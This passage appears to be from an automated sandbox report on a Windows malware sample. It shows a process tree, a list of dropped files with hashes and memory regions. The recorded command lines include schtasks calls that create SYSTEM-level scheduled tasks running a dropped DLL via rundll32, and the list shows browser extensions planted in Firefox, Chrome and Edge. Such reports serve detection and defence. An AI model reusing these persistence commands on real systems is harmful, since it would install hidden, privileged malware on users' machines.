                                                                                                                  schtasks /CREATE /TN "PNYixZeXsqZpVKW2" /F /xml "C:\Program Files (x86)\VVgdUZLbU\uRazLqG.xml" /RU "SYSTEM"
                                                                                                                  2⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                  PID:1280
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /END /TN "PNYixZeXsqZpVKW"
                                                                                                                  2⤵
                                                                                                                    PID:1004
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /DELETE /F /TN "PNYixZeXsqZpVKW"
                                                                                                                    2⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:4908
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /CREATE /TN "CVvOFbqbJLRHBH" /F /xml "C:\Program Files (x86)\bvOaypMPnvJU2\OOoSRFE.xml" /RU "SYSTEM"
                                                                                                                    2⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:3304
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /CREATE /TN "gnLaBnTbMSBet2" /F /xml "C:\ProgramData\VhLijRxUJlqjyVVB\JxDXXdn.xml" /RU "SYSTEM"
                                                                                                                    2⤵
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:1232
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /CREATE /TN "CcZJXhjssQPPLCDwz2" /F /xml "C:\Program Files (x86)\XgywPJLnIuIbRuigTDR\yNckqzh.xml" /RU "SYSTEM"
                                                                                                                    2⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:2324
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /CREATE /TN "MMCulgKRbKFKGIMNOya2" /F /xml "C:\Program Files (x86)\GfzXWCCsFRMrC\fpTVeCG.xml" /RU "SYSTEM"
                                                                                                                    2⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:3944
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /CREATE /TN "fTWiavJbWOFnfXaJS" /SC once /ST 04:19:32 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RDPbNEzdUsgCtKDC\plHIrzuP\rZhEweL.dll\",#1 /FdidXNs 385121" /V1 /F
                                                                                                                    2⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:1268
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /run /I /tn "fTWiavJbWOFnfXaJS"
                                                                                                                    2⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:4128
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /DELETE /F /TN "FjXDdrejgGyCBhByH"
                                                                                                                    2⤵
                                                                                                                      PID:692
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 2304
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:1384
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4732 -ip 4732
                                                                                                                    1⤵
                                                                                                                      PID:812
                                                                                                                    • C:\Windows\system32\rundll32.EXE
                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RDPbNEzdUsgCtKDC\plHIrzuP\rZhEweL.dll",#1 /FdidXNs 385121
                                                                                                                      1⤵
                                                                                                                        PID:4884
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RDPbNEzdUsgCtKDC\plHIrzuP\rZhEweL.dll",#1 /FdidXNs 385121
                                                                                                                          2⤵
                                                                                                                          • Blocklisted process makes network request
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Loads dropped DLL
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Enumerates system info in registry
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:4924
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /DELETE /F /TN "fTWiavJbWOFnfXaJS"
                                                                                                                            3⤵
                                                                                                                              PID:1944
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4040 -ip 4040
                                                                                                                          1⤵
                                                                                                                            PID:3300
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2892 -ip 2892
                                                                                                                            1⤵
                                                                                                                              PID:1436
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:3020

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                                              Filesize

                                                                                                                              129B

                                                                                                                              MD5

                                                                                                                              a526b9e7c716b3489d8cc062fbce4005

                                                                                                                              SHA1

                                                                                                                              2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                                              SHA256

                                                                                                                              e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                                              SHA512

                                                                                                                              d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                                            • C:\Program Files (x86)\GfzXWCCsFRMrC\fpTVeCG.xml

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              f6046d156aa77b21e6acf94d3f21898b

                                                                                                                              SHA1

                                                                                                                              d6b1828ffe28401568c2b676ab5e213ef2fb98a9

                                                                                                                              SHA256

                                                                                                                              de9b48791888485150bf30cfabb6ab2c3bf3d0bb50460ed8c12782d81c516f7c

                                                                                                                              SHA512

                                                                                                                              ebc1ea21deaa74190d3e8aa1f703bb359c45d6b413048425e8941f3fda54a3054c210befaa47576bbe82d924440a06a03af7662bd8f9bfe055da707d54c15e99

                                                                                                                            • C:\Program Files (x86)\VVgdUZLbU\uRazLqG.xml

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              ae86aadf629b6bcd58d2199ae3fb2207

                                                                                                                              SHA1

                                                                                                                              98d10d3ed76d5e42e5f5121be37cb47ce6f9b1bc

                                                                                                                              SHA256

                                                                                                                              ad143b2c0df3b73b23df387766689d9507bd4b0b219526ea3a4be37c6dff6dc5

                                                                                                                              SHA512

                                                                                                                              b23b4f49872e78850a3748f97967c837db948f8014b9f12970e95ba755d7d7974c0bb7dae0f13b2cd702227f4c382596410a2720b131971dbdfbb106fb6c8e81

                                                                                                                            • C:\Program Files (x86)\XgywPJLnIuIbRuigTDR\yNckqzh.xml

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              268aa6bce06c7fec899d838197becc96

                                                                                                                              SHA1

                                                                                                                              b97a7cce65047409d7671c94ed48d32d029cea03

                                                                                                                              SHA256

                                                                                                                              162b9081624a94a79837124e7ae4c5e780d3e944d828f452624dad02f5ab15f2

                                                                                                                              SHA512

                                                                                                                              2b97bbf0c3e3bfd6608d17ab3dde78c9ab438ee69652b20f245a97f13f8bce972d2290576512e62a8f7983cff455af43ca4b7f596305df128e8fb89d4f13ec3b

                                                                                                                            • C:\Program Files (x86)\bvOaypMPnvJU2\OOoSRFE.xml

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              4f0b27369492809a374b8e2a173b9a80

                                                                                                                              SHA1

                                                                                                                              e0c3ab981bb2962fb7a7d7f9f18e2456a7f97818

                                                                                                                              SHA256

                                                                                                                              2293b3d194fa1b0c92c9af92dfc985ee40ed6d7a0184097c3de6f401bf834c58

                                                                                                                              SHA512

                                                                                                                              3beaea728dfe4f84509f9e03501ac02e8ef7bdac91c8165ccba29966cb5fef35ac800ac5104b11c2681fdc4ae9cb7705ba8504e904d2abd1d6f84d48871bb55f

                                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                              Filesize

                                                                                                                              2.1MB

                                                                                                                              MD5

                                                                                                                              0ab23855affdcf428bad80e74b717eea

                                                                                                                              SHA1

                                                                                                                              6c408785aca14386df066c0264531a8f019abf39

                                                                                                                              SHA256

                                                                                                                              07115f91721b4fdaf891cee2e64e99966c483a5e998bca8a054982df0ecc234f

                                                                                                                              SHA512

                                                                                                                              806a08589bcfe0f99513454b5ed031c318e2490effbd91a5c01a06089ac890fc6889a094d95361da5fe1bcd9908c655144b50cf178c445255ba642bf4ca1cdd7

                                                                                                                            • C:\ProgramData\VhLijRxUJlqjyVVB\JxDXXdn.xml

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              5943f35cb19024d883ab962cbc2a05ac

                                                                                                                              SHA1

                                                                                                                              d62802c2e1bd766d0945d8eeca4398199b547282

                                                                                                                              SHA256

                                                                                                                              c56e4f3ccedfc9a815cd304e56a28f51fc40be54308419d31b34e38edb0f0b9b

                                                                                                                              SHA512

                                                                                                                              a80f01b50905ae484bf05a0eb29c768f7d9502efc6ecc1a5b20b38e720f964d5bce79b97b3d270cfa5363474a629497dfeace3f626424bf59b3b4f669abc45f5

                                                                                                                            • C:\Users\Admin\AppData\Local\Gerda Play3 SE\gerdaplay3se32.exe

                                                                                                                              Filesize

                                                                                                                              3.0MB

                                                                                                                              MD5

                                                                                                                              1583dbe9ad97affdf0ca9d6cdfd3c46e

                                                                                                                              SHA1

                                                                                                                              e3d090b48d19414b5002c0db08b070c840e6bd9f

                                                                                                                              SHA256

                                                                                                                              eaec73f7a03a296844b241cc4337d76765ca747ae279900b3a66c4ab4685ffe7

                                                                                                                              SHA512

                                                                                                                              9ce27407c3804940e88af503b9237f41d0b4c62590833d0a04915c3b1918e9487ce84d17bd91a9d68bb6fb15084a22da293f9cbd5fda49d8ec33cde3cdbadc18

                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                              Filesize

                                                                                                                              187B

                                                                                                                              MD5

                                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                                              SHA1

                                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                              SHA256

                                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                              SHA512

                                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                              Filesize

                                                                                                                              136B

                                                                                                                              MD5

                                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                              SHA1

                                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                              SHA256

                                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                              SHA512

                                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                              Filesize

                                                                                                                              150B

                                                                                                                              MD5

                                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                              SHA1

                                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                                              SHA256

                                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                              SHA512

                                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              def65711d78669d7f8e69313be4acf2e

                                                                                                                              SHA1

                                                                                                                              6522ebf1de09eeb981e270bd95114bc69a49cda6

                                                                                                                              SHA256

                                                                                                                              aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                                                                                                              SHA512

                                                                                                                              05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\es\messages.json

                                                                                                                              Filesize

                                                                                                                              151B

                                                                                                                              MD5

                                                                                                                              bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                              SHA1

                                                                                                                              9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                              SHA256

                                                                                                                              b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                              SHA512

                                                                                                                              3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                              Filesize

                                                                                                                              2B

                                                                                                                              MD5

                                                                                                                              d751713988987e9331980363e24189ce

                                                                                                                              SHA1

                                                                                                                              97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                              SHA256

                                                                                                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                              SHA512

                                                                                                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                                                                                              Filesize

                                                                                                                              40B

                                                                                                                              MD5

                                                                                                                              20d4b8fa017a12a108c87f540836e250

                                                                                                                              SHA1

                                                                                                                              1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                                                                              SHA256

                                                                                                                              6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                                                                              SHA512

                                                                                                                              507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              11KB

                                                                                                                              MD5

                                                                                                                              18b7ca77a51292ca84c4b4951bb14d7f

                                                                                                                              SHA1

                                                                                                                              4b8b5dedddd268ede0239020881cb4199810fb13

                                                                                                                              SHA256

                                                                                                                              5bf62207773054fd670af495020d9e147e1fc760ab4b992fa2d2b42445ad7d5d

                                                                                                                              SHA512

                                                                                                                              9a1016eb2cb0c894da51a0b909f7bde14459e4d237504f1fc3a41e2c6bb1f0a7e02d6e52052f2413fb2c8c33a6fedd1556b5730037407f53e7927b4e6a981923

                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              15KB

                                                                                                                              MD5

                                                                                                                              6332366181c9d0edf546f3bfd014bc5b

                                                                                                                              SHA1

                                                                                                                              3cf3c5336444d0b93b17340ce806aa63aac371dd

                                                                                                                              SHA256

                                                                                                                              b91c1d0d2b6afb653c5513b1dfdfe89da73e605cc7bcf099794a42e7d6c2a62e

                                                                                                                              SHA512

                                                                                                                              2b214f1f8ce767c05c02f526d8c64a9534c3d9918e43abf3e8474597e5828097a9abb024dfea588bbc469706d3b22992a4a4f88f97cb8bf1bd6d5e0efb5dc28b

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS7BA3.tmp\Install.exe

                                                                                                                              Filesize

                                                                                                                              6.4MB

                                                                                                                              MD5

                                                                                                                              54a80af0685d8a1774f702db3ee8dbf5

                                                                                                                              SHA1

                                                                                                                              91220edf7e31ba16f754e14ff45104d927ae67f5

                                                                                                                              SHA256

                                                                                                                              ccf138dbe48d0f872d211fc33ff2de13edb62a74ba1c1b45a5f0d81248bc46f6

                                                                                                                              SHA512

                                                                                                                              21a125b1737f4bdba6457eab87b15bff86f4280fdf348197a281a8136c4f08827dd8b2393e9cd777081cc12c8c5c2f7e17af5ccbbfd175661bf93bb27cf1a049

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS7E82.tmp\Install.exe

                                                                                                                              Filesize

                                                                                                                              6.7MB

                                                                                                                              MD5

                                                                                                                              75fb5f8595a2c77b6616a5dbbdfa5696

                                                                                                                              SHA1

                                                                                                                              c7532dd40dfda00c0934a3470f980852860586b5

                                                                                                                              SHA256

                                                                                                                              804534351d0ea162eecc1ceb26f7918026595ef1aff3c6b00bec38e1541ca6e2

                                                                                                                              SHA512

                                                                                                                              ba0ef6024b602e17972ea0bc8df8b47925c87a2b05288a4d5b3a0fb29a6d483ccc27c27aee1d284e9c24b4f6b3645dd82ee0542e1331d6d148b43cf1d0b3003a

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oklpduza.fxf.ps1

                                                                                                                              Filesize

                                                                                                                              60B

                                                                                                                              MD5

                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                              SHA1

                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                              SHA256

                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                              SHA512

                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-G0MKQ.tmp\_isetup\_iscrypt.dll

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              a69559718ab506675e907fe49deb71e9

                                                                                                                              SHA1

                                                                                                                              bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                                                                              SHA256

                                                                                                                              2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                                                                              SHA512

                                                                                                                              e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-NEPUJ.tmp\stories.tmp

                                                                                                                              Filesize

                                                                                                                              692KB

                                                                                                                              MD5

                                                                                                                              4b12cdede9c10df05585de79bafa6f3b

                                                                                                                              SHA1

                                                                                                                              c7b2c22718fb0a0037ac67f964ac43ed784f4e53

                                                                                                                              SHA256

                                                                                                                              0f1b99e50b2ffb8f87308abda6e3e50b6deb2377cc21920489704c0852f6bee4

                                                                                                                              SHA512

                                                                                                                              52bdb7591544598cdeafc95a6eda1e9ee67662da3340f1f2a33d1bc55dfe07d95b4636743c5a846ee8f635319352e7293282b92eb40c1ce38902c2a540442256

                                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmd08l7e.default-release\prefs.js

                                                                                                                              Filesize

                                                                                                                              12KB

                                                                                                                              MD5

                                                                                                                              11eaf61f0128977825a038237ae4e9f8

                                                                                                                              SHA1

                                                                                                                              5c5cc1972b3cb5a1b867b4c30c8f6378ff45a41d

                                                                                                                              SHA256

                                                                                                                              8a389d0059e73bdfdd3fe43a33bcee9d6c4f7f04a3197192eee086b333c0477d

                                                                                                                              SHA512

                                                                                                                              b97affbab29305f18ef1a6ef5b1b9e2159da2b30c49f5493cb688b96c3f495002f272e7b88b6872d2da7618a8c2cabb39ac7ed887af2af4f116fada29ddf6606

                                                                                                                            • C:\Users\Admin\Documents\Channel2.exe

                                                                                                                              Filesize

                                                                                                                              6.3MB

                                                                                                                              MD5

                                                                                                                              d66f93f2791e94bc6edf57b008e7bbec

                                                                                                                              SHA1

                                                                                                                              6f116bfa8de52fd448f197427588744fabe9b2da

                                                                                                                              SHA256

                                                                                                                              17ae975bc89c6255bb747b81a28199bd962643f706121ab98b2112f015a9a087

                                                                                                                              SHA512

                                                                                                                              ad48e838c76890f0f05e102c9974c9ecab7ea05eacc3b37bc6ec4023e0d59c00519452170dd1f8e86cc8599c15d660839617bce42d25a3febd77edba80fe5ae3

                                                                                                                            • C:\Users\Admin\Documents\CheckTool.exe

                                                                                                                              Filesize

                                                                                                                              31.7MB

                                                                                                                              MD5

                                                                                                                              b8a15f36239ac6a968a373bf93d06ce6

                                                                                                                              SHA1

                                                                                                                              beabb3da9b91dcbe608dd85d28d9bb69c744e3c0

                                                                                                                              SHA256

                                                                                                                              fd6269ba61258f30291430d11ab1f0a6cf13e23d0fb9e6850212d6a1e4ead7ca

                                                                                                                              SHA512

                                                                                                                              cef10f7b3fcb9eb980c020fb55af18a1162084f7e9147f279fdbb64e179c1874c9dbedbb4ac76046b023b03235ebb0ea6bd12a008f69673ab89a1e7f0448fe89

                                                                                                                            • C:\Users\Admin\Documents\setup.exe

                                                                                                                              Filesize

                                                                                                                              7.3MB

                                                                                                                              MD5

                                                                                                                              391d4a464150942614b3e6a25c1eb9dc

                                                                                                                              SHA1

                                                                                                                              4a37ba1e710055029ad5f681fb425de7b10d8ee4

                                                                                                                              SHA256

                                                                                                                              518d13a8d88566e280e58cc91dd9fa1c97d82ed3b256a6504c1971114492efd5

                                                                                                                              SHA512

                                                                                                                              a83f7736dc50b93365e697b4e45fe71f81001a5217888e7f3d70ab81fc0d0e229e5ffed62ce3f8f047f09ce10b940f7495c8188641091e665f089f0cebf5f180

                                                                                                                            • C:\Users\Admin\Documents\stories.exe

                                                                                                                              Filesize

                                                                                                                              3.1MB

                                                                                                                              MD5

                                                                                                                              6f949546f07d90ed4bc3c4d91374d073

                                                                                                                              SHA1

                                                                                                                              01bc8ffedcc5b84d09a13f009851486240b9a300

                                                                                                                              SHA256

                                                                                                                              3e9c93a076f257fba2ec57d4a3fa7d6afa32f419b5c537848ed57ed8690744d8

                                                                                                                              SHA512

                                                                                                                              0ef9fb601d90f51418ac87bed5f3fd01df8cd6b91cdbead70a8f98f81d9e88835e32c4ea64544efb527f0f5c33691032af3057fa3b05be1936b6cc25767c5a60

                                                                                                                            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              5315900105942deb090a358a315b06fe

                                                                                                                              SHA1

                                                                                                                              22fe5d2e1617c31afbafb91c117508d41ef0ce44

                                                                                                                              SHA256

                                                                                                                              e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7

                                                                                                                              SHA512

                                                                                                                              77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

                                                                                                                            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              15KB

                                                                                                                              MD5

                                                                                                                              caff38605f919f2d485c3507d40530be

                                                                                                                              SHA1

                                                                                                                              1e631ccc01110abd5e6e210b3185b51e8c6c4f2c

                                                                                                                              SHA256

                                                                                                                              70b063fc8b2e97b5c8ec92e7b756e38ba1355aafccdb33532a2481b843fffd68

                                                                                                                              SHA512

                                                                                                                              bc986e4e931bfc06bfc42dc94df3e99659f3e94324b7f87505d435898614185cc19e91542198e5ea52c0ec03d394d4ad3c982b24b937938e58650b9be6e95cad

                                                                                                                            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              11KB

                                                                                                                              MD5

                                                                                                                              289d265ff19344d109136b156edc9a75

                                                                                                                              SHA1

                                                                                                                              0cc183e0815cb70191759a75b2fdae49f0a89352

                                                                                                                              SHA256

                                                                                                                              4dd9f50bbc35a494f551635395505c2babd6968681d968e3dd8acd74926479c1

                                                                                                                              SHA512

                                                                                                                              88fa3e6600b957422b512a7dd3bcf0bcbcef69f941e446df3c06887c88f20d1bc57c22c020a08460d19995b2a256f7425b3a0e4b1b5f817f5d4e5d31fb516de9

                                                                                                                            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              11KB

                                                                                                                              MD5

                                                                                                                              c6d1f7348284152369a03cc33e713589

                                                                                                                              SHA1

                                                                                                                              ffb870b12ee2b64f36961dc9593f97d08789d0ae

                                                                                                                              SHA256

                                                                                                                              5cc36e828e2d3f888c768ff53534ec07fe697d54170c91c9be34eb09f2fb5357

                                                                                                                              SHA512

                                                                                                                              debc957a2fccccc4e138ec36d1ed0dcb3b36af991750faa6b88e08d0fc29de195168e321c60f626e2e68539050e53c9a3f111f7487dffcfa6e36830f7e2f8111

                                                                                                                            • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              15KB

                                                                                                                              MD5

                                                                                                                              3750add5a8b3b2461841cb2741d0bfd8

                                                                                                                              SHA1

                                                                                                                              dfc82c869ada9d9c3c690efebba1285438e58bcb

                                                                                                                              SHA256

                                                                                                                              021b7f4f2d7ed6af9060c1ad20d5a73416f0812916027289e3ff773d0e7e4fc3

                                                                                                                              SHA512

                                                                                                                              6098d0711ede402d0651705aa89bad284e402f356e9ec85ca3e4c3b0b07a0e5143d92d5596d24d17a378a8222e242eda75712055dcd51b8899032b880fa2e29f

                                                                                                                            • C:\Windows\Temp\RDPbNEzdUsgCtKDC\plHIrzuP\rZhEweL.dll

                                                                                                                              Filesize

                                                                                                                              6.5MB

                                                                                                                              MD5

                                                                                                                              db17adceb15a67dde637649bcdd11f37

                                                                                                                              SHA1

                                                                                                                              4beef7bec5f473e31869fc3de7b1c6cf7836aa7f

                                                                                                                              SHA256

                                                                                                                              69c9007b722d26db7109b9d05fc216c84429668d001dd33c43bf8fee1dce7d86

                                                                                                                              SHA512

                                                                                                                              9fb81f583a98cf143c207a61ff7c7d26956c5ff535dd75e1b3a71eca893934d249cf93093fb5cd4f3dec4361ea9ff5829a3bbbae818509adafca83edfcbcdd2b

                                                                                                                            • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                              Filesize

                                                                                                                              6KB

                                                                                                                              MD5

                                                                                                                              27c15d6ac9b81f6dfde3de821e2fc6a3

                                                                                                                              SHA1

                                                                                                                              9c813b9f40038479af4a989f2fdd63ab693e85c7

                                                                                                                              SHA256

                                                                                                                              eac9490d13cd42d2528188aa4fe40d52c0497be36c6be0d480910d0fc97e7553

                                                                                                                              SHA512

                                                                                                                              6022946791534d90fc0cd1c79a20f00a36ea868aba7aa574c1252cdcfe0ecc92da4c273d9e006afa4f95612339d764c255f184a2c5cbf5bf490a2b7795cfb69b

                                                                                                                            • memory/808-245-0x00000000043B0000-0x0000000004704000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.3MB

                                                                                                                            • memory/1316-187-0x0000000004670000-0x00000000049C4000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.3MB

                                                                                                                            • memory/1316-195-0x0000000004CB0000-0x0000000004CFC000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              304KB

                                                                                                                            • memory/1840-34-0x0000000005410000-0x0000000005476000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              408KB

                                                                                                                            • memory/1840-46-0x0000000006210000-0x000000000622E000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              120KB

                                                                                                                            • memory/1840-48-0x0000000007280000-0x0000000007316000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              600KB

                                                                                                                            • memory/1840-32-0x0000000005480000-0x0000000005AA8000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              6.2MB

